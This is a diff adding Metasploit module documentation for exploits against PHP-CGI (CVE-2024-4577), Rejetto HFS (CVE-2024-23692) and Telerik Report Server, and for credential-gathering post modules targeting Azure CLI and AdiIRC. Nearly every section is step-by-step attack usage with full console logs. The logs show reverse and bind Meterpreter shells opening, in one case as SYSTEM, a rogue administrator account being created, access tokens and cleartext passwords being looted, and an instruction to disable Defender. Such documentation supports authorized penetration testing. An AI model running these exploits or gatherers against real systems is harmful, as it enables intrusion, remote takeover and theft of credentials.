+
+```
+ #
+ # PHP-CGI setup
+ #
+ <FilesMatch "\.php$">
+     SetHandler application/x-httpd-php-cgi
+ </FilesMatch>
+ <IfModule actions_module>
+     Action application/x-httpd-php-cgi "/php-cgi/php-cgi.exe"
+ </IfModule>
+```
+
+If you modify the Apache config, dont forget to restart the Apache server to pick up the changes.
+
+## Verification Steps
+Note: On Windows, disable Defender if you are using the command payloads. This is not needed for the PHP payloads
+as they execute in-memory.
+
+1. Start msfconsole
+2. `use exploit/windows/http/php_cgi_arg_injection_rce_cve_2024_4577`
+3. `set RHOST <TARGET_IP_ADDRESS>`
+4. `set target 0`
+5. `set payload php/meterpreter/reverse_tcp`
+6. `set LHOST eth0`
+7. `check`
+8. `exploit`
+
+## Scenarios
+
+### Windows PHP
+
+```
+msf6 exploit(windows/http/php_cgi_arg_injection_rce_cve_2024_4577) > set RHOSTS 192.168.86.50
+RHOSTS => 192.168.86.50
+msf6 exploit(windows/http/php_cgi_arg_injection_rce_cve_2024_4577) > check
+[+] 192.168.86.50:80 - The target is vulnerable. Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
+msf6 exploit(windows/http/php_cgi_arg_injection_rce_cve_2024_4577) > set target 0
+target => 0
+msf6 exploit(windows/http/php_cgi_arg_injection_rce_cve_2024_4577) > set payload php/meterpreter/reverse_tcp
+payload => php/meterpreter/reverse_tcp
+msf6 exploit(windows/http/php_cgi_arg_injection_rce_cve_2024_4577) > set LHOST eth0
+LHOST => eth0
+msf6 exploit(windows/http/php_cgi_arg_injection_rce_cve_2024_4577) > show options
+
+Module options (exploit/windows/http/php_cgi_arg_injection_rce_cve_2024_4577):
+
+   Name       Current Setting       Required  Description
+   ----       ---------------       --------  -----------
+   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     192.168.86.50         yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT      80                    yes       The target port (TCP)
+   SSL        false                 no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI  /php-cgi/php-cgi.exe  yes       The path to a PHP CGI endpoint
+   VHOST                            no        HTTP server virtual host
+
+
+Payload options (php/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  eth0             yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Windows PHP
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(windows/http/php_cgi_arg_injection_rce_cve_2024_4577) > check
+[+] 192.168.86.50:80 - The target is vulnerable. Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
+msf6 exploit(windows/http/php_cgi_arg_injection_rce_cve_2024_4577) > exploit
+
+[*] Started reverse TCP handler on 192.168.86.42:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
+[*] Sending stage (39927 bytes) to 192.168.86.50
+[*] Meterpreter session 1 opened (192.168.86.42:4444 -> 192.168.86.50:49761) at 2024-06-10 17:32:52 +0100
+
+meterpreter > getuid
+Server username: Administrator
+meterpreter > pwd
+C:\xampp\php
+meterpreter > sysinfo
+Computer    : WIN-V28QNSO2H05
+OS          : Windows NT WIN-V28QNSO2H05 10.0 build 20348 (Windows Server 2022) AMD64
+Meterpreter : php/windows
+meterpreter > 
+```
+
+### Windows Command
+
+```
+msf6 exploit(windows/http/php_cgi_arg_injection_rce_cve_2024_4577) > set target 1
+target => 1
+msf6 exploit(windows/http/php_cgi_arg_injection_rce_cve_2024_4577) > set payload cmd/windows/http/x64/meterpreter/reverse_tcp
+payload => cmd/windows/http/x64/meterpreter/reverse_tcp
+msf6 exploit(windows/http/php_cgi_arg_injection_rce_cve_2024_4577) > show options
+
+Module options (exploit/windows/http/php_cgi_arg_injection_rce_cve_2024_4577):
+
+   Name       Current Setting       Required  Description
+   ----       ---------------       --------  -----------
+   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     192.168.86.50         yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT      80                    yes       The target port (TCP)
+   SSL        false                 no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI  /php-cgi/php-cgi.exe  yes       The path to a PHP CGI endpoint
+   VHOST                            no        HTTP server virtual host
+
+
+Payload options (cmd/windows/http/x64/meterpreter/reverse_tcp):
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   EXITFUNC            process          yes       Exit technique (Accepted: '', seh, thread, process, none)
+   FETCH_COMMAND       CERTUTIL         yes       Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL)
+   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
+   FETCH_FILENAME      ZyJgsNjYvpTX     no        Name to use on remote system when storing payload; cannot contain spaces or slashes
+   FETCH_SRVHOST                        no        Local IP to use for serving payload
+   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
+   FETCH_URIPATH                        no        Local URI to use for serving payload
+   FETCH_WRITABLE_DIR  %TEMP%           yes       Remote writable dir to store payload; cannot contain spaces.
+   LHOST               eth0             yes       The listen address (an interface may be specified)
+   LPORT               4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   1   Windows Command
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(windows/http/php_cgi_arg_injection_rce_cve_2024_4577) > check
+[+] 192.168.86.50:80 - The target is vulnerable. Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
+msf6 exploit(windows/http/php_cgi_arg_injection_rce_cve_2024_4577) > exploit
+
+[*] Started reverse TCP handler on 192.168.86.42:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
+[*] Sending stage (201798 bytes) to 192.168.86.50
+[*] Meterpreter session 2 opened (192.168.86.42:4444 -> 192.168.86.50:49780) at 2024-06-10 17:34:45 +0100
+
+meterpreter > getuid
+Server username: WIN-V28QNSO2H05\Administrator
+meterpreter > pwd
+C:\xampp\php
+meterpreter > sysinfo
+Computer        : WIN-V28QNSO2H05
+OS              : Windows Server 2022 (10.0 Build 20348).
+Architecture    : x64
+System Language : ja_JP
+Domain          : WORKGROUP
+Logged On Users : 1
+Meterpreter     : x64/windows
+meterpreter > 
+```

documentation/modules/exploit/windows/http/rejetto_hfs_rce_cve_2024_23692.md

@@ -0,0 +1,112 @@
+## Vulnerable Application
+The Rejetto HTTP File Server (HFS) version 2.x is vulnerable to a unauthenticated server side template
+injection (SSTI) vulnerability. An remote unauthenticated attacker can execute code with the privileges
+of the user account running the HFS.exe server process. This exploit has been tested to work against version
+2.4.0 RC7 and 2.3m. The Rejetto HTTP File Server (HFS) version 2.x is no longer supported by the maintainers
+and no patch is available. Users are recommended to upgrade to version 3.x.
+
+## Testing
+[Download](https://github.com/rejetto/hfs2/releases/download/v2.4-rc06/hfs.exe) a vulnerable version of HTTP
+File Server (HFS). To run this server, simply execute the HFS.exe binary. By default the server will listen for
+HTTP connections on port 80.
+
+The exploit has been tested against versions:
+* 2.4.0 RC7
+* 2.3m
+
+## Verification Steps
+Note: On Windows, disable Defender if you are using the default payloads.
+
+1. Start msfconsole
+2. `use exploit/windows/http/rejetto_hfs_rce_cve_2024_23692`
+3. `set RHOST <TARGET_IP_ADDRESS>`
+4. `set payload cmd/windows/http/x64/meterpreter_reverse_http`
+5. `set LHOST eth0`
+6. `set LPORT 4444`
+7. `check`
+8. `exploit`
+
+## Scenarios
+
+### Automatic
+
+```
+msf6 > use exploit/windows/http/rejetto_hfs_rce_cve_2024_23692
+[*] No payload configured, defaulting to cmd/windows/http/x64/meterpreter/reverse_tcp
+msf6 exploit(windows/http/rejetto_hfs_rce_cve_2024_23692) > set RHOSTS 192.168.86.35
+RHOSTS => 192.168.86.35
+msf6 exploit(windows/http/rejetto_hfs_rce_cve_2024_23692) > set payload cmd/windows/http/x64/meterpreter_reverse_http
+payload => cmd/windows/http/x64/meterpreter_reverse_http
+msf6 exploit(windows/http/rejetto_hfs_rce_cve_2024_23692) > set LHOST eth0
+LHOST => eth0
+msf6 exploit(windows/http/rejetto_hfs_rce_cve_2024_23692) > set LPORT 4444
+LPORT => 4444
+msf6 exploit(windows/http/rejetto_hfs_rce_cve_2024_23692) > show options
+
+Module options (exploit/windows/http/rejetto_hfs_rce_cve_2024_23692):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     192.168.86.35    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT      80               yes       The target port (TCP)
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI                   yes       The base path to the web application
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (cmd/windows/http/x64/meterpreter_reverse_http):
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   EXITFUNC            process          yes       Exit technique (Accepted: '', seh, thread, process, none)
+   EXTENSIONS                           no        Comma-separate list of extensions to load
+   EXTINIT                              no        Initialization strings for extensions
+   FETCH_COMMAND       CERTUTIL         yes       Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL)
+   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
+   FETCH_FILENAME      gnwWBKQz         no        Name to use on remote system when storing payload; cannot contain spaces or slashes
+   FETCH_SRVHOST                        no        Local IP to use for serving payload
+   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
+   FETCH_URIPATH                        no        Local URI to use for serving payload
+   FETCH_WRITABLE_DIR  %TEMP%           yes       Remote writable dir to store payload; cannot contain spaces.
+   LHOST               eth0             yes       The local listener hostname
+   LPORT               4444             yes       The local listener port
+   LURI                                 no        The HTTP Path
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Automatic
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(windows/http/rejetto_hfs_rce_cve_2024_23692) > check
+[+] 192.168.86.35:80 - The target is vulnerable. Rejetto HFS version 2.4.0 RC7
+msf6 exploit(windows/http/rejetto_hfs_rce_cve_2024_23692) > exploit 
+
+[*] Started HTTP reverse handler on http://192.168.86.42:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Rejetto HFS version 2.4.0 RC7
+[!] http://192.168.86.42:4444 handling request from 192.168.86.35; (UUID: ykybl99e) Without a database connected that payload UUID tracking will not work!
+[*] http://192.168.86.42:4444 handling request from 192.168.86.35; (UUID: ykybl99e) Redirecting stageless connection from /pBzS1uPGeqRa91v1PJaNDwwtxXK-KTpGms8g with UA 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0'
+[!] http://192.168.86.42:4444 handling request from 192.168.86.35; (UUID: ykybl99e) Without a database connected that payload UUID tracking will not work!
+[*] http://192.168.86.42:4444 handling request from 192.168.86.35; (UUID: ykybl99e) Attaching orphaned/stageless session...
+[!] http://192.168.86.42:4444 handling request from 192.168.86.35; (UUID: ykybl99e) Without a database connected that payload UUID tracking will not work!
+[*] Meterpreter session 1 opened (192.168.86.42:4444 -> 192.168.86.35:31348) at 2024-06-06 16:38:33 +0100
+
+meterpreter > getuid
+Server username: testing-vm\user
+meterpreter > sysinfo
+Computer        : TESTING-VM
+OS              : Windows 11 (10.0 Build 22631).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x64/windows
+meterpreter >
+```

documentation/modules/exploit/windows/http/telerik_report_server_deserialization.md

@@ -0,0 +1,77 @@
+## Vulnerable Application
+This module chains an authentication bypass vulnerability (CVE-2024-4358) with a deserialization vulnerability
+(CVE-2024-1800) to obtain remote code execution against Telerik Report Server version 10.0.24.130 and prior.
+The authentication bypass flaw allows an unauthenticated user to create a new user with administrative privileges.
+The USERNAME datastore option can be used to authenticate with an existing account to prevent the creation of a
+new one. The deserialization flaw works by uploading a specially crafted report that when loaded will execute an
+OS command as NT AUTHORITY\SYSTEM. The module will automatically delete the created report but not the account
+because users are unable to delete themselves.
+
+## Verification Steps
+
+1. Install the application
+1. Start msfconsole
+1. Do: `use exploit/windows/http/telerik_report_server_deserialization`
+1. Set the `RHOSTS`, `PAYLOAD` and payload-related options
+1. Do: `run`
+
+## Options
+
+### USERNAME
+Username for the existing account. A new account with random username will be used unless specified.
+
+### PASSWORD
+Password for the account. If a new account is created, then a random value wil be used unless specified. If an
+existing account is used, the password will be used as-is.
+
+## Scenarios
+
+### Telerik Report Server 8.0.22.225 on Windows Server 2022
+
+```
+metasploit-framework (S:0 J:0) exploit(windows/http/telerik_report_server_deserialization) > set RHOSTS 192.168.159.27
+RHOSTS => 192.168.159.27
+metasploit-framework (S:0 J:0) exploit(windows/http/telerik_report_server_deserialization) > set VERBOSE true
+VERBOSE => true
+metasploit-framework (S:0 J:0) exploit(windows/http/telerik_report_server_deserialization) > set PAYLOAD cmd/windows/powershell/meterpreter/bind_tcp
+PAYLOAD => cmd/windows/powershell/meterpreter/bind_tcp
+metasploit-framework (S:0 J:0) exploit(windows/http/telerik_report_server_deserialization) > check
+
+[*] Using auxiliary/scanner/http/telerik_report_server_auth_bypass as check
+[*] Detected Telerik Report Server version: 8.0.22.225.
+[+] 192.168.159.27:83 - The target is vulnerable. Telerik Report Server 8.0.22.225 is affected.
+metasploit-framework (S:0 J:0) exploit(windows/http/telerik_report_server_deserialization) > run
+
+[*] Powershell command length: 4211
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Using auxiliary/scanner/http/telerik_report_server_auth_bypass as check
+[*] Detected Telerik Report Server version: 8.0.22.225.
+[+] The target is vulnerable. Telerik Report Server 8.0.22.225 is affected.
+[*] Creating a new administrator account using CVE-2024-4358
+[+] Created account: benny:g7RkmoaboNexvOKh (Note: This account will not be deleted by the module)
+[+] Successfully authenticated as benny
+[*] Using category: SamplesX
+[*] Created report: tD8xpobpBn
+[+] The server responded with an error indicating that the payload was executed
+[*] Started bind TCP handler against 192.168.159.27:4444
+[-] The connection was refused by the remote host (192.168.159.27:4444).
+[-] The connection was refused by the remote host (192.168.159.27:4444).
+[-] The connection was refused by the remote host (192.168.159.27:4444).
+[*] Sending stage (176198 bytes) to 192.168.159.27
+[*] Meterpreter session 1 opened (192.168.250.134:46613 -> 192.168.159.27:4444) at 2024-06-06 14:37:18 -0400
+[*] Deleting report 'tD8xpobpBn' (ID: 64897ea2acf)
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > sysinfo
+Computer        : SRV-DOM
+OS              : Windows Server 2022 (10.0 Build 20348).
+Architecture    : x64
+System Language : en_US
+Domain          : labs1collabu0
+Logged On Users : 14
+Meterpreter     : x86/windows
+meterpreter > pwd
+c:\windows\system32\inetsrv
+meterpreter > 
+```

documentation/modules/post/multi/gather/azure_cli_creds.md

@@ -0,0 +1,187 @@
+## Vulnerable Application
+
+Any windows, linux, or osx system with a `meterpreter` session and
+
+[Azure CLI 2.0+](https://docs.microsoft.com/en-us/cli/azure/?view=azure-cli-latest).
+
+Successfully tested on:
+
+* Azure CLI 2.0.33 on Windows Server 2012 R2, and Windows 10
+* azure-cli 2.0.33-1.el7 on openSUSE Tumbleweed 20180517
+* Azure CLI 2.61.0 on Windows 10
+* Azure CLI 2.35.0 on [Docker](https://github.com/rapid7/metasploit-framework/pull/10113#issuecomment-2191464809)
+
+## Verification Steps
+
+1. Install Azure CLI
+2. Start msfconsole
+3. Get a `meterpreter` session on some host.
+4. Do: `use post/multi/gather/azure_cli_creds`
+5. Do: `set SESSION [SESSION_ID]`
+6. Do: `run`
+7. If the system has readable configuration files for Azure CLI, they will stored in loot and a summary will be printed to the screen.
+
+## Options
+
+## Scenarios
+
+### A new install of 2.0.33 (empty data files) on Windows 10
+
+```
+[msf](Jobs:0 Agents:1) post(multi/gather/azure_cli_creds) > run
+
+[*] az cli version: 2.0.33
+[*] Looking for az cli data in C:\Users\windows
+[*]   Checking for config files
+[+]     .Azure/config stored in /root/.msf4/loot/20240616175854_default_111.111.1.11_azure.config.ini_081029.txt
+[*]   Checking for context files
+[*]   Checking for profile files
+[+]     .Azure/azureProfile.json stored in /root/.msf4/loot/20240616175855_default_111.111.1.11_azure.profile.js_357740.txt
+[*]   Checking for console history files
+[*] Post module execution completed
+```
+
+### 2.61.0 on Windows 10
+
+```
+msf6 post(multi/gather/azure_cli_creds) > rerun
+[*] Reloading module...
+
+[*] az cli version: 2.61.0
+[*] Looking for az cli data in C:\Users\kali
+[*]   Checking for config files
+[*]   Checking for context files
+[*]   Checking for profile files
+[*]   Checking for console history files
+[+]     C:\Users\kali/AppData/Roaming/Microsoft/Windows/PowerShell/PSReadLine/ConsoleHost_history.txt stored in /root/.msf4/loot/20240624150413_default_111.111.11.111_azure.console_hi_878016.txt
+[*]   Checking for powershell transcript files
+[*] Looking for az cli data in C:\Users\h00die
+[*]   Checking for config files
+[+]     .Azure\config stored in /root/.msf4/loot/20240624150413_default_111.111.11.111_azure.config.ini_539242.txt
+[*]   Checking for context files
+[+]     .Azure/AzureRmContext.json stored in /root/.msf4/loot/20240624150414_default_111.111.11.111_azure.context.js_041230.txt
+[*]   Checking for profile files
+[+]     .Azure/azureProfile.json stored in /root/.msf4/loot/20240624150414_default_111.111.11.111_azure.profile.js_538496.txt
+[*]   Checking for console history files
+[+]     C:\Users\h00die/AppData/Roaming/Microsoft/Windows/PowerShell/PSReadLine/ConsoleHost_history.txt stored in /root/.msf4/loot/20240624150414_default_111.111.11.111_azure.console_hi_210490.txt
+[*]   Checking for powershell transcript files
+[+]     C:\Users\h00die/Documents/PowerShell_transcript.EDLT.Dz6sxz6B.20150720151906.txt stored in /root/.msf4/loot/20240624150415_default_111.111.11.111_azure.transcript_021248.txt
+[+]     C:\Users\h00die/Documents/PowerShell_transcript.EDLT.Dz6sxz6B.20230720151906.txt stored in /root/.msf4/loot/20240624150415_default_111.111.11.111_azure.transcript_743088.txt
+[+] Line 1 may contain sensitive information. Manual search recommended, keyword hit: New-PSSession
+[+] Subscriptions
+=============
+
+ Account Name               Username                              Cloud Name
+ ------------               --------                              ----------
+ EXAMPLE11111               1111111111111-1111-1111-111111111111  AzureCloud
+ N/A(tenant level account)  james@example12.onmicrosoft.com       AzureCloud
+
+[+] Context
+=======
+
+ Username                           Account Type      Access Token                           Graph Access Token                       MS Graph Access Token  Key Vault Token                       Principal Secret
+ --------                           ------------      ------------                           ------------------                       ---------------------  ---------------                       ----------------
+ 1111111111111-1111-1111-111111111  AccessToken       eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsI  eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng                         eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIs
+ 111                                                  ng1dCI6IkwxS2ZLRklfam5YYndXYzIyeFp4dz  1dCI6IkwxS2ZLRklfam5YYndXYzIyeFp4dzFzVU                         Ing1dCI6IkwxS2ZLRklfam5YYndXYzIyeFp4
+                                                      (clip)                                 (clip)                                                          (clip)
+ HelpDeskAdmin@example123456.onmic  User
+ rosoft.com
+ 1111111111111-1111-1111-111111111  ServicePrincipal
+ a1c
+ 1111111111111-1111-1111-111111111  AccessToken       eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsI                                                                  eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIs
+ f40                                                  ng1dCI6IkwxS2ZLRklfam5YYndXYzIyeFp4dz                                                                  Ing1dCI6IkwxS2ZLRklfam5YYndXYzIyeFp4
+                                                      (clip)                                                                                                 (clip)
+ storageviewer@example12.onmicros  User
+ oft.com
+
+[*] Post module execution completed
+msf6 post(multi/gather/azure_cli_creds) > 
+```
+
+### 2.35.0 on Docker
+
+```
+msf6 post(multi/gather/azure_cli_creds) > run
+
+[!] SESSION may not be compatible with this module:
+[!]  * missing Meterpreter features: stdapi_railgun_api, stdapi_railgun_api_multi, stdapi_railgun_memread, stdapi_railgun_memwrite, stdapi_registry_check_key_exists, stdapi_registry_create_key, stdapi_registry_delete_key, stdapi_registry_enum_key_direct, stdapi_registry_enum_value_direct, stdapi_registry_load_key, stdapi_registry_open_key, stdapi_registry_query_value_direct, stdapi_registry_set_value_direct, stdapi_registry_unload_key, stdapi_sys_config_getprivs
+[*] Unable to determine az cli version
+[*] Looking for az cli data in /bin
+[*]   Checking for config files
+[*]   Checking for context files
+[*]   Checking for profile files
+[*] Looking for az cli data in /dev
+[*]   Checking for config files
+[*]   Checking for context files
+[*]   Checking for profile files
+[*] Looking for az cli data in /home/user
+[*]   Checking for config files
+[+]     .azure/config stored in /home/mtcyr/.msf4/loot/20240627140350_default_172.17.0.2_azure.config.ini_433702.txt
+[*]   Checking for context files
+[*]   Checking for profile files
+[+]     .azure/azureProfile.json stored in /home/mtcyr/.msf4/loot/20240627140350_default_172.17.0.2_azure.profile.js_201042.txt
+[*] Looking for az cli data in /nonexistent
+[*]   Checking for config files
+[*]   Checking for context files
+[*]   Checking for profile files
+[*] Looking for az cli data in /root
+[*]   Checking for config files
+[*]   Checking for context files
+[*]   Checking for profile files
+[*] Looking for az cli data in /usr/games
+[*]   Checking for config files
+[*]   Checking for context files
+[*]   Checking for profile files
+[*] Looking for az cli data in /usr/sbin
+[*]   Checking for config files
+[*]   Checking for context files
+[*]   Checking for profile files
+[*] Looking for az cli data in /var/backups
+[*]   Checking for config files
+[*]   Checking for context files
+[*]   Checking for profile files
+[*] Looking for az cli data in /var/cache/man
+[*]   Checking for config files
+[*]   Checking for context files
+[*]   Checking for profile files
+[*] Looking for az cli data in /var/lib/gnats
+[*]   Checking for config files
+[*]   Checking for context files
+[*]   Checking for profile files
+[*] Looking for az cli data in /var/list
+[*]   Checking for config files
+[*]   Checking for context files
+[*]   Checking for profile files
+[*] Looking for az cli data in /var/mail
+[*]   Checking for config files
+[*]   Checking for context files
+[*]   Checking for profile files
+[*] Looking for az cli data in /var/run/ircd
+[*]   Checking for config files
+[*]   Checking for context files
+[*]   Checking for profile files
+[*] Looking for az cli data in /var/spool/lpd
+[*]   Checking for config files
+[*]   Checking for context files
+[*]   Checking for profile files
+[*] Looking for az cli data in /var/spool/news
+[*]   Checking for config files
+[*]   Checking for context files
+[*]   Checking for profile files
+[*] Looking for az cli data in /var/spool/uucp
+[*]   Checking for config files
+[*]   Checking for context files
+[*]   Checking for profile files
+[*] Looking for az cli data in /var/www
+[*]   Checking for config files
+[*]   Checking for context files
+[*]   Checking for profile files
+[+] Subscriptions
+=============
+
+ Account Name               Username                                          Cloud Name
+ ------------               --------                                          ----------
+ N/A(tenant level account)  example123@example12345678901234.onmicrosoft.com  AzureCloud
+
+[*] Post module execution completed
+```

documentation/modules/post/windows/gather/credentials/adi_irc.md

@@ -0,0 +1,167 @@
+## Vulnerable Application
+
+This post-exploitation module extracts clear text credentials from the Adi IRC Client.
+
+The Adi IRC Client is avaialble from (https://www.adiirc.com/).
+
+This module extracts information from the config.ini and networks.ini files in the "AppData\Local\AdiIRC" directory.
+
+This module extracts server information such as server name, server port, user name, and password.
+
+
+## Verification Steps
+
+1. Start MSF console
+2. Get a Meterpreter session on a Windows system
+3. use post/windows/gather/credentials/adi_irc
+4. Set SESSION 1
+5. enter 'run' to extract credentials from all applications
+
+
+## Options
+### VERBOSE
+
+By default verbose is turned off. When turned on, the module will show information on files
+which aren't extracted and information that is not directly related to the artifact output.
+
+
+### STORE_LOOT
+This option is turned on by default and saves the stolen artifacts/files on the local machine,
+this is required for also extracting credentials from files using regexp, JSON, XML, and SQLite queries.
+
+
+### EXTRACT_DATA
+This option is turned on by default and will perform the data extraction using the predefined
+regular expression. The 'Store loot' options must be turned on in order for this to take work.
+
+## Scenarios
+### AdiIRC Client v4.4 on Microsoft Windows 10 Home 10.0.19045 N/A Build 19045 - Default Output
+```
+msf6 post(windows/gather/credentials/adi_irc) > run
+
+[*] Filtering based on these selections:  
+[*] ARTIFACTS: All
+[*] STORE_LOOT: true
+[*] EXTRACT_DATA: true
+
+[*] Adi irc's Config file found
+[*] Downloading C:\Users\test\AppData\Local\AdiIRC\config.bak
+[*] Adi irc Config.bak downloaded
+[+] File saved to:  /home/kali/.msf4/loot/20240508083920_default_10.0.0.2_AdiIRCconfig.ba_051695.bak
+
+[+] serverhost=chat.freenode.net
+[+] Serverhost=irc.test.net
+[+] serverport=6667
+[+] Serverport=6667
+[+] Usernick=TheTester
+[+] QuickPassword=tiaspbiqe2r
+[+] File with data saved:  /home/kali/.msf4/loot/20240508083921_default_10.0.0.2_EXTRACTIONconfig_949744.bak
+[*] Downloading C:\Users\test\AppData\Local\AdiIRC\config.ini
+[*] Adi irc Config.ini downloaded
+[+] File saved to:  /home/kali/.msf4/loot/20240508083921_default_10.0.0.2_AdiIRCconfig.in_618977.ini
+
+[+] serverhost=chat.freenode.net
+[+] Serverhost=irc.test.net
+[+] serverport=6667
+[+] Serverport=6667
+[+] Usernick=TheTester
+[+] QuickPassword=tiaspbiqe2r
+[+] File with data saved:  /home/kali/.msf4/loot/20240508083921_default_10.0.0.2_EXTRACTIONconfig_981500.ini
+[*] Downloading C:\Users\test\AppData\Local\AdiIRC\networks.ini
+[*] Adi irc Networks.ini downloaded
+[+] File saved to:  /home/kali/.msf4/loot/20240508083921_default_10.0.0.2_AdiIRCnetworks._976889.ini
+
+[+] File with data saved:  /home/kali/.msf4/loot/20240508083922_default_10.0.0.2_EXTRACTIONconfig_407804.ini
+[*] Adi irc's Networks file found
+[*] Downloading C:\Users\test\AppData\Local\AdiIRC\networks.ini
+[*] Adi irc Networks.ini downloaded
+[+] File saved to:  /home/kali/.msf4/loot/20240508083922_default_10.0.0.2_AdiIRCnetworks._497206.ini
+
+[*] undefined method `each' for nil:NilClass
+[*] Downloading C:\Users\test\AppData\Local\AdiIRC\networks.bak
+[*] Adi irc Networks.bak downloaded
+[+] File saved to:  /home/kali/.msf4/loot/20240508083922_default_10.0.0.2_AdiIRCnetworks._102963.bak
+
+[*] undefined method `each' for nil:NilClass
+[*] PackRat credential sweep Completed
+[*] Post module execution completed
+```
+
+### AdiIRC Client v4.4 on Microsoft Windows 10 Home 10.0.19045 N/A Build 19045 - Verbose Output
+```
+msf6 post(windows/gather/credentials/adi_irc) > run
+
+[*] Filtering based on these selections:  
+[*] ARTIFACTS: All
+[*] STORE_LOOT: true
+[*] EXTRACT_DATA: true
+
+[*] Starting Packrat...
+[-] Adi irc's base folder not found in user's user directory
+
+[-] Adi irc's base folder not found in user's user directory
+
+[*] Starting Packrat...
+[*] Adi irc's base folder found
+[*] Found the folder containing specified artifact for config.
+[*] Adi irc's Config file found
+[*] Processing C:\Users\test\AppData\Local\AdiIRC
+[*] Downloading C:\Users\test\AppData\Local\AdiIRC\config.bak
+[*] Adi irc Config.bak downloaded
+[+] File saved to:  /home/kali/.msf4/loot/20240508083813_default_10.0.0.2_AdiIRCconfig.ba_900175.bak
+
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] serverhost=chat.freenode.net
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] Serverhost=irc.test.net
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] serverport=6667
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] Serverport=6667
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] Usernick=TheTester
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] QuickPassword=tiaspbiqe2r
+[+] File with data saved:  /home/kali/.msf4/loot/20240508083814_default_10.0.0.2_EXTRACTIONconfig_209914.bak
+[*] Processing C:\Users\test\AppData\Local\AdiIRC
+[*] Downloading C:\Users\test\AppData\Local\AdiIRC\config.ini
+[*] Adi irc Config.ini downloaded
+[+] File saved to:  /home/kali/.msf4/loot/20240508083814_default_10.0.0.2_AdiIRCconfig.in_918837.ini
+
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] serverhost=chat.freenode.net
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] Serverhost=irc.test.net
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] serverport=6667
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] Serverport=6667
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] Usernick=TheTester
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] QuickPassword=tiaspbiqe2r
+[+] File with data saved:  /home/kali/.msf4/loot/20240508083814_default_10.0.0.2_EXTRACTIONconfig_383684.ini
+[*] Processing C:\Users\test\AppData\Local\AdiIRC
+[*] Downloading C:\Users\test\AppData\Local\AdiIRC\networks.ini
+[*] Adi irc Networks.ini downloaded
+[+] File saved to:  /home/kali/.msf4/loot/20240508083814_default_10.0.0.2_AdiIRCnetworks._579169.ini
+
+[+] File with data saved:  /home/kali/.msf4/loot/20240508083814_default_10.0.0.2_EXTRACTIONconfig_073623.ini
+[*] Adi irc's base folder found
+[*] Found the folder containing specified artifact for networks.
+[*] Adi irc's Networks file found
+[*] Processing C:\Users\test\AppData\Local\AdiIRC
+[*] Downloading C:\Users\test\AppData\Local\AdiIRC\networks.ini
+[*] Adi irc Networks.ini downloaded
+[+] File saved to:  /home/kali/.msf4/loot/20240508083814_default_10.0.0.2_AdiIRCnetworks._045399.ini
+
+[*] undefined method `each' for nil:NilClass
+[*] Processing C:\Users\test\AppData\Local\AdiIRC
+[*] Downloading C:\Users\test\AppData\Local\AdiIRC\networks.bak
+[*] Adi irc Networks.bak downloaded
